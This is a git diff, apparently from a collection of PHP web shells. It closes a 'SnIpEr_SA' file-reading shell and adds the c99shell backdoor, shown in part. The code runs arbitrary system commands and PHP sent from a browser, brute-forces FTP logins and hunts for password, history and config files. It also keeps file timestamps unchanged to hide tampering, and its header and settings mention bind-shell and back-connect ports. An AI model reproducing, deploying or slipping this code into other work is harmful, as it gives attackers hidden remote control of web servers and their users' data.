+echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=tahoma size=-2><b>o---[ SnIpEr_SA Shell | <a href=http://3asfh.net>http://3asfh.net</a> | <a SnIpEr.SA@hotmail.com>sniper.sa@hotmail.com</a> | تعريب وتطوير ]---o</b></font></div></td></tr></table>".$f;
+
+
+$u1p=""; // File to Include...
or use _GET _POST
+$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
+
+
+
+echo "<PRE>\n";
+if(empty($snn)){
+if(empty($_GET['snn'])){
+if(empty($_POST['snn'])){
+die("\nSnIpEr_SA");
+} else {
+$u1p=$_POST['snn'];
+}
+} else {
+$u1p=$_GET['snn'];
+}
+}
+
+$temp=tempnam($tymczas, "cx");
+
+if(copy("compress.zlib://".$snn, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "".htmlspecialchars($tekst)."";
+unlink($temp);
+
+} else {
+die("<FONT COLOR=\"RED\"><CENTER>
+<B>".htmlspecialchars($u1p)."</B> عفوا! الملف غير موجود او ليس لديك الصلاحيه للدخول.</CENTER></FONT>");
+}
+
+?>
\ No newline at end of file
diff --git a/php/PHPshell/c99/c99.jpg b/php/PHPshell/c99/c99.jpg
new file mode 100644
index 0000000..91ca406
Binary files /dev/null and b/php/PHPshell/c99/c99.jpg differ
diff --git a/php/PHPshell/c99/c99.php b/php/PHPshell/c99/c99.php
new file mode 100644
index 0000000..dc6d688
--- /dev/null
+++ b/php/PHPshell/c99/c99.php
@@ -0,0 +1,3069 @@ +<?php +/* +****************************************************************************************************** +* +* c99shell.php v.1.0 pre-release build #13 +* Freeware license. +* آ© CCTeaM. +* c99shell - أ´أ أ©أ«-أ¬أ¥أ­أ¥أ¤أ¦أ¥أ° أ·أ¥أ°أ¥أ§ www-أ،أ°أ®أ³أ§أ¥أ°, "أ§أ أ²أ®أ·أ¥أ­أ»أ©" أ¤أ«أ؟ أ¢أ§أ«أ®أ¬أ . +* أ‚أ» أ¬أ®أ¦أ¥أ²أ¥ أ،أ¥أ±أ¯أ«أ أ²أ­أ® أ±أھأ أ·أ أ²أ¼ أ¯أ®أ±أ«أ¥أ¤أ­أ¾أ¾ أ¢أ¥أ°أ±أ¨أ¾ أ­أ  أ¤أ®أ¬أ أ¸أ­أ¥أ© أ±أ²أ°أ أ­أ¨أ·أھأ¥ أ¯أ°أ®أ¤أ³أھأ²أ : + http://ccteam.ru/releases/c99shell +* +* WEB: http://ccteam.ru +* ICQ UIN #: 656555 +* +* أژأ±أ®أ،أ¥أ­أ­أ®أ±أ²أ¨: +* + أ³أ¯أ°أ أ¢أ«أ¥أ­أ¨أ¥ أ«أ®أھأ أ«أ¼أ­أ»أ¬أ¨ أ¨ أ³أ¤أ أ«أ¥أ­أ­أ»أ¬أ¨ (ftp, samba) أ´أ أ©أ«أ أ¬أ¨/أ¯أ أ¯أھأ أ¬أ¨, أ±أ®أ°أ²أ¨أ°أ®أ¢أھأ  +* أ§أ أھأ أ·أ¨أ¢أ أ­أ¨أ¥ أ±أھأ أ·أ¨أ¢أ أ­أ¨أ¥ أ´أ أ©أ«أ®أ¢ أ¨ أ¯أ أ¯أ®أھ +* (أ¯أ°أ¥أ¤أ¢أ®أ°أ¨أ²أ¥أ«أ¼أ­أ® أ³أ¯أ أھأ®أ¢أ»أ¢أ أ¥أ²أ±أ؟/أ°أ أ±أ¯أ أھأ®أ¢أ»أ¢أ أ¥أ²أ±أ؟ أ·أ¥أ°أ¥أ§ tar) +* أ¯أ°أ®أ¤أ¢أ¨أ­أ³أ²أ»أ© أ¯أ®أ¨أ±أھ (أ¢أ®أ§أ¬أ®أ¦أ¥أ­ أ¢أ­أ³أ²أ°أ¨ أ´أ أ©أ«أ®أ¢) +* modify-time أ¨ access-time أ³ أ´أ أ©أ«أ®أ¢ أ­أ¥ أ¬أ¥أ­أ؟أ¾أ²أ±أ؟ أ¯أ°أ¨ أ°أ¥أ¤أ أھأ²أ¨أ°أ®أ¢أ أ­أ¨أ¨ (أ¤أ«أ؟ أ®أ²أھأ«. 
أ±أ¬ $filestealth) +* + أ¢أ»أ¯أ®أ«أ­أ¥أ­أ¨أ¥ أ¯أ°أ®أ¨أ§أ¢أ®أ«أ¼أ­أ®أ£أ® PHP-أھأ®أ¤أ  +* + أھأ®أ¤أ¨أ°أ®أ¢أ¹أ¨أھ أ¤أ أ­أ­أ»أµ أ·أ¥أ°أ¥أ§ md5, unix-md5, sha1, crc32, base64 +* + أ،أ»أ±أ²أ°أ»أ© أ«أ®أھأ أ«أ¼أ­أ»أ© أ أ­أ أ«أ¨أ§ أ،أ¥أ§أ®أ¯أ أ±أ­أ®أ±أ²أ¨ أژأ‘ +* + أ،أ»أ±أ²أ°أ®أ¥ ftp-أ±أھأ أ­أ¨أ°أ®أ¢أ أ­أ¨أ¥ أ­أ  أ±أ¢أ؟أ§أھأ¨ login;login أ¨أ§ /etc/passwd (أ®أ،أ»أ·أ­أ® أ¤أ أ¥أ² أ¤أ®أ±أ²أ³أ¯ أھ 1/100 أ أھأھأ أ³أ­أ²أ®أ¢) +* أ¯أ®أ±أ²أ°أ أ­أ¨أ·أ­أ»أ© أ¢أ»أ¢أ®أ¤, أ±أ®أ°أ²أ¨أ°أ®أ¢أھأ , أ£أ°أ³أ¯أ¯أ®أ¢أ»أ¥ أ®أ¯أ¥أ°أ أ¶أ¨أ¨ أ­أ أ¤ أپأ„/أ²أ أ،أ«أ¨أ¶أ أ¬أ¨, أ³أ¯أ°أ أ¢أ«أ¥أ­أ¨أ¥ أ¯أ°أ®أ¶أ¥أ±أ±أ أ¬أ¨ SQL) +* + أ±أھأ°أ¨أ¯أ² "أ«أ¾أ،أ¨أ²" include: أ أ¢أ²أ®أ¬أ أ²أ¨أ·أ¥أ±أھأ¨ أ¨أ¹أ¥أ² أ¯أ¥أ°أ¥أ¬أ¥أ­أ­أ»أ¥ أ± أ¤أ¥أ±أھأ°أ¨أ¯أ²أ®أ°أ أ¬أ¨ أ¨ أ¢أ±أ²أ أ¢أ«أ؟أ¥أ² أ¨أµ أ¢ أ±أ±أ»أ«أھأ¨ (أ®أ¯أ¶أ¨أ أ«أ¼أ­أ®) + أ²أ أھأ¦أ¥ أ¬أ®أ¦أ­أ® أ¨أ§أ¬أ¥أ­أ¨أ²أ¼ $surl (أ،أ أ§أ®أ¢أ أ؟ أ±أ±أ»أ«أھأ ) أھأ أھ أ·أ¥أ°أ¥أ§ أھأ®أ­أ´أ¨أ£أ³أ°أ أ¶أ¨أ¾ (أ¯أ°أ¨أ­أ³أ¤أ¨أ²أ¥أ«أ¼أ­أ®) أ²أ أھ أ¨ أ·أ¥أ°أ¥أ§ cookie "c99sh_surl", + أ¨أ¤أ¥أ² أ أ¢أ²أ®-أ§أ أ¯أ¨أ±أ¼ أ§أ­أ أ·أ¥أ­أ¨أ؟ $set_surl أ¢ cookie "set_surl" +* + أ¢أ®أ§أ¬أ®أ¦أ­أ®أ±أ²أ¼ "أ§أ أ،أ¨أ­أ¤أ¨أ²أ¼" /bin/bash أ­أ  أ®أ¯أ°أ¥أ¤أ¥أ«أ¥أ­أ­أ»أ© أ¯أ®أ°أ² أ± أ¯أ°أ®أ¨أ§أ¢أ®أ«أ¼أ­أ»أ¬ أ¯أ أ°أ®أ«أ¥أ¬, +* أ¨أ«أ¨ أ±أ¤أ¥أ«أ أ²أ¼ back connect (أ¯أ°أ®أ¨أ§أ¢أ®أ¤أ¨أ²أ±أ؟ أ²أ¥أ±أ²أ¨أ°أ®أ¢أ أ­أ¨أ¥ أ±أ®أ¥أ¤أ¥أ­أ¥أ­أ¨أ؟, أ¨ أ¢أ»أ¢أ®أ¤أ؟أ²أ±أ؟ أ¯أ أ°أ أ¬أ¥أ²أ°أ» أ¤أ«أ؟ أ§أ أ¯أ³أ±أھأ  NetCat). +* + أ¢أ®أ§أ¬أ®أ¦أ­أ®أ±أ²أ¼ أ،أ»أ±أ²أ°أ®أ£أ® أ±أ أ¬أ®-أ³أ¤أ أ«أ¥أ­أ¨أ؟ أ±أھأ°أ¨أ¯أ²أ  +* + أ أ¢أ²أ®أ¬أ أ²أ¨أ§أ¨أ°أ®أ¢أ أ­أ أ؟ أ®أ²أ¯أ°أ أ¢أھأ  أ±أ®أ®أ،أ¹أ¥أ­أ¨أ© أ® أ­أ¥أ¤أ®أ°أ أ،أ®أ²أھأ أµ أ¨ أ¯أ®أ¦أ¥أ«أ أ­أ¨أ؟أµ أ أ¢أ²أ®أ°أ³ (أ·أ¥أ°أ¥أ§ mail()) +* +* أڈأ°أ¨أ¢أ¥أ¤أ¥أ­ أ¤أ أ«أ¥أھأ® أ­أ¥ أ¯أ®أ«أ­أ»أ© أ±أ¯أ¨أ±أ®أھ أ¢أ®أ§أ¬أ®أ¦أ­أ®أ±أ²أ¥أ©. 
+* +* أژأ¦أ¨أ¤أ أ¥أ¬أ»أ¥ أ¨أ§أ¬أ¥أ­أ¥أ­أ¨أ؟: +* ~ أگأ أ§أ¢أ¨أ²أ¨أ¥ sql-أ¬أ¥أ­أ¥أ¤أ¦أ¥أ°أ  +* ~ أ„أ®أ،أ أ¢أ«أ¥أ­أ¨أ¥ أ­أ¥أ¤أ®أ±أ²أ أ¾أ¹أ¨أµ أ°أ أ±أ¸أ¨أ°أ¥أ­أ¨أ© أ´أ أ©أ«أ®أ¢ +* +* ~-~ أڈأ¨أ¸أ¨أ²أ¥ أ®أ،أ® أ¢أ±أ¥أµ أ­أ أ©أ¤أ¥أ­أ»أµ أ­أ¥أ¤أ®أ°أ أ،أ®أ²أھأ أµ, أ¦أ¥أ«أ أ¥أ¬أ»أµ أ¨أ§أ¬أ¥أ­أ¥أ­أ¨أ؟أµ أ¨ أ¤أ®أ°أ أ،أ®أ²أھأ أµ (أ¤أ أ¦أ¥ أ® أ±أ أ¬أ»أµ أ­أ¥أ§أ­أ أ·أ¨أ²أ¥أ«أ¼أ­أ»أµ!) + أ¢ ICQ UIN #656555 أ«أ¨أ،أ® أ·أ¥أ°أ¥أ§ أ°أ أ§أ¤أ¥أ« "feedback", أ،أ³أ¤أ³أ² أ°أ أ±أ±أ¬أ®أ²أ°أ¥أ­أ» أ¢أ±أ¥ أ¯أ°أ¥أ¤أ«أ®أ¦أ¥أ­أ¨أ؟ أ¨ أ¯أ®أ¦أ¥أ«أ أ­أ¨أ؟. +* +* Last modify: 29.07.2005 +* +* آ© Captain Crunch Security TeaM. Coded by tristram +* +****************************************************************************************************** +*/ +//Starting calls +if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} +error_reporting(5); +@ignore_user_abort(true); +@set_magic_quotes_runtime(0); +$win = strtolower(substr(PHP_OS,0,3)) == "win"; +define("starttime",getmicrotime()); +if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} + +$shver = "1.0 pre-release build #13"; //Current version +//CONFIGURATION AND SETTINGS +if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} +elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} +else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL +} + +$surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL. 
+
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+if (empty($surl))
+{
+ $surl = "?".$includestr; //Self url
+}
+$surl = htmlspecialchars($surl);
+
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
+
+//Authentication
+$login = ""; //login
+//DON'T FORGOT ABOUT PASSWORD!!!
+$pass = ""; //password
+$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
+
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
+$login_txt = "Restricted area"; //http-auth message.
+$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";
+
+$gzipencode = true; //Encode with gzip?
+
+$updatenow = false; //If true, update now (this variable will be false)
+
+$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server
+$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server
+
+$filestealth = true; //if true, don't change modify- and access-time
+
+$donated_html = "<center><b>Owned by hacker</b></center>";
+ /* If you publish free shell and you wish
+ add link to your site or any other information,
+ put here your html. */
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
+
+$curdir = "./"; //start folder
+//$curdir = getenv("DOCUMENT_ROOT");
+$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
+$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
+
+$log_email = "user@host.tld"; //Default e-mail for sending logs
+
+$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
+$sort_save = true; //If true then save sorting-position using cookies.
+
+// Registered file-types.
+// array(
+// "{action1}"=>array("ext1","ext2","ext3",...),
+// "{action2}"=>array("ext4","ext5","ext6",...),
+// ...
+// )
+$ftypes = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+
+// Registered executable file-types.
+// array(
+// string "command{i}"=>array("ext1","ext2","ext3",...),
+// ...
+// )
+// {command}: %f% = filename
+$exeftypes = array(
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+ "perl %f%" => array("pl","cgi")
+);
+
+/* Highlighted files.
+ array(
+ i=>array({regexp},{type},{opentag},{closetag},{break})
+ ...
+ )
+ string {regexp} - regular exp.
+ int {type}:
+ 0 - files and folders (as default),
+ 1 - files only, 2 - folders only
+ string {opentag} - open html-tag, e.g. "<b>" (default)
+ string {closetag} - close html-tag, e.g. "</b>" (default)
+ bool {break} - if true and found match then break
+*/
+$regxp_highlight = array(
+ array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
+ array("config.php",1) // example
+);
+
+$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
+ // array (i=>{letter} ...); string {letter} - letter of a drive
+//$safemode_diskettes = range("a","z");
+$hexdump_lines = 8; // lines in hex preview file
+$hexdump_rows = 24; // 16, 24 or 32 bytes in one line
+
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd
+
+$bindport_pass = "c99"; // default password for binding
+$bindport_port = "31373"; // default port for binding
+$bc_port = "31373"; // default port for back-connect
+$datapipe_localport = "8081"; // default port for datapipe
+
+// Command-aliases
+if (!$win)
+{
+ $cmdaliases = array(
+ array("-----------------------------------------------------------", "ls -la"),
+ array("find all suid files", "find / -type f -perm -04000 -ls"),
+ array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
+ array("find all sgid files", "find / -type f -perm -02000 -ls"),
+ array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
+ array("find config.inc.php files", "find / -type f -name config.inc.php"),
+ array("find config* files", "find / -type f -name \"config*\""),
+ array("find config* files in current dir", "find . -type f -name \"config*\""),
+ array("find all writable folders and files", "find / -perm -2 -ls"),
+ array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
+ array("find all service.pwd files", "find / -type f -name service.pwd"),
+ array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
+ array("find all .htpasswd files", "find / -type f -name .htpasswd"),
+ array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
+ array("find all .bash_history files", "find / -type f -name .bash_history"),
+ array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
+ array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
+ array("find .fetchmailrc files in current dir", "find .
-type f -name .fetchmailrc"),
+ array("list file attributes on a Linux second extended file system", "lsattr -va"),
+ array("show opened ports", "netstat -an | grep -i listen")
+ );
+}
+else
+{
+ $cmdaliases = array(
+ array("-----------------------------------------------------------", "dir"),
+ array("show opened ports", "netstat -an")
+ );
+}
+
+$sess_cookie = "c99shvars"; // Cookie-variable name
+
+$usefsbuff = true; //Buffer-function
+$copy_unset = false; //Remove copied files from buffer after pasting
+
+//Quick launch
+$quicklaunch = array(
+ array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
+ array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
+ array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
+ array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
+ array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),
+ array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
+ array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
+ array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
+ array("<b>Tools</b>",$surl."act=tools&d=%d"),
+ array("<b>Proc.</b>",$surl."act=processes&d=%d"),
+ array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),
+ array("<b>Sec.</b>",$surl."act=security&d=%d"),
+ array("<b>SQL</b>",$surl."act=sql&d=%d"),
+ array("<b>PHP-code</b>",$surl."act=eval&d=%d"),
+ array("<b>Update</b>",$surl."act=update&d=%d"),
+ array("<b>Feedback</b>",$surl."act=feedback&d=%d"),
+ array("<b>Self remove</b>",$surl."act=selfremove"),
+
array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
+);
+
+//Highlight-code colors
+$highlight_background = "#c0c0c0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["c99shcook"]);
+
+//END CONFIGURATION
+
+
+// \/ Next code isn't for editing \/
+@set_time_limit(0);
+$tmp = array();
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
+if (!empty($login))
+{
+ if (empty($md5_pass)) {$md5_pass = md5($pass);}
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
+ {
+ if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
+ header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\"");
+ header("HTTP/1.0 401 Unauthorized");
+ exit($accessdeniedmess);
+ }
+}
+if ($act != "img")
+{
+$lastdir = realpath(".");
+chdir($curdir);
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}
+$sess_data = unserialize($_COOKIE["$sess_cookie"]);
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+
+$disablefunc = @ini_get("disable_functions");
+if (!empty($disablefunc))
+{
+ $disablefunc = str_replace(" ","",$disablefunc);
+ $disablefunc = explode(",",$disablefunc);
+}
+
+if (!function_exists("c99_buff_prepare"))
+{
+function c99_buff_prepare()
+{
+ global $sess_data;
+ global $act;
+ foreach($sess_data["copy"] 
as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ $sess_data["copy"] = array_unique($sess_data["copy"]);
+ $sess_data["cut"] = array_unique($sess_data["cut"]);
+ sort($sess_data["copy"]);
+ sort($sess_data["cut"]);
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+}
+c99_buff_prepare();
+if (!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_cookie;
+ global $sess_data;
+ c99_buff_prepare();
+ $sess_data = $data;
+ $data = serialize($data);
+ setcookie($sess_cookie,$data);
+}
+}
+foreach (array("sort","sql_sort") as $v)
+{
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+}
+if ($sort_save)
+{
+ if (!empty($sort)) {setcookie("sort",$sort);}
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len)
+ {
+ $len = ceil($len/2) - 2;
+ return substr($content, 0,$len)."...".substr($content,-$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if (!is_numeric($size)) {return false;}
+ else
+ {
+ if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+ elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+ elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+ else {$size = $size . 
" B";}
+ return $size;
+ }
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($o = readdir($h)) !== false)
+ {
+ if (($o != ".") and ($o != ".."))
+ {
+ if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+ else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+ if (!$ret) {return $ret;}
+ }
+ }
+ closedir($h);
+ return true;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+ if (is_dir($d))
+ {
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+ return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d)) {return copy($d,$t);}
+ else {return false;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while (($o = readdir($h)) !== false)
+ {
+ if (($o != ".") and ($o != ".."))
+ {
+ $ret = true;
+ if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+ else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = false;}}
+ if (!$ret) {return $ret;}
+ }
+ }
+ closedir($h);
+ return true;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (is_dir($d))
+ {
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= 
DIRECTORY_SEPARATOR;}
+ return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+ if(copy($d,$t)) {return unlink($d);}
+ else {unlink($t); return false;}
+ }
+ else {return false;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while (($o = readdir($h)) !== false)
+ {
+ if (($o != ".") and ($o != ".."))
+ {
+ if (!is_dir($d.$o)) {unlink($d.$o);}
+ else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+ }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+ if (is_dir($o))
+ {
+ if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+ return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return false;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+ if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+ elseif (($result = `$cmd`) !== false) {}
+ elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+ elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+ elseif (is_resource($fp = popen($cmd,"r")))
+ {
+ $result = "";
+ while(!feof($fp)) {$result .= fread($fp,1024);}
+ pclose($fp);
+ }
+ }
+ return $result;
+}
+}
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 
0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+ return $type.join("",$owner).join("",$group).join("",$world);
+}
+}
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return false;}}
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return false;}}
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return false;}}
+if (!function_exists("parse_perms"))
+{
+function parse_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$t = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
